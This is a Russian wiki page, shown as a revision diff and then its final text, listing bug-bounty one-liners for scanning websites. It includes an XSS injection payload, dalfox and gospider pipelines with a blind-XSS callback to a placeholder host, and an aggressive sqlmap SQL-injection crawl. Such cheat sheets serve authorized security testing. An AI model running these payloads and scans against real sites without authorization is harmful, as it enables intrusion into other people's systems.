Bugbounty — различия между версиями
Материал из InformationSecurity WIKI
Drakylar (обсуждение | вклад) (Новая страница: «На странице будут однострочники, позволяющие быстро проверить вебсайт на конкретные уя…») |
Drakylar (обсуждение | вклад) м |
||
(не показаны 2 промежуточные версии этого же участника) | |||
Строка 1: | Строка 1: | ||
На странице будут однострочники, позволяющие быстро проверить вебсайт на конкретные уязвимости | На странице будут однострочники, позволяющие быстро проверить вебсайт на конкретные уязвимости | ||
+ | = Уязвимости = | ||
+ | == XSS == | ||
+ | <syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | echo http://testphp.vulnweb.com | waybackurls | gf xss | qsreplace '"><img src=x onerror=alert(1);>' | freq | ||
+ | |||
+ | gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt | ||
+ | |||
+ | waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt | ||
+ | |||
+ | cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")" | ||
− | + | </syntaxhighlight> | |
+ | |||
+ | == SQL injection == | ||
+ | |||
+ | <syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | python sqlmap.py -u http://example.com --forms --batch --crawl=10 --cookie=jsessionid=12345 --level=5 --risk=3 | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | == Backups == | ||
+ | |||
+ | |||
+ | = Ссылки = | ||
+ | |||
+ | https://github.com/dwisiswant0/awesome-oneliner-bugbounty |
Текущая версия на 12:13, 20 марта 2022
На странице будут однострочники, позволяющие быстро проверить вебсайт на конкретные уязвимости
Содержание
Уязвимости
XSS
echo http://testphp.vulnweb.com | waybackurls | gf xss | qsreplace '"><img src=x onerror=alert(1);>' | freq
gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt
waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
SQL injection
python sqlmap.py -u http://example.com --forms --batch --crawl=10 --cookie=jsessionid=12345 --level=5 --risk=3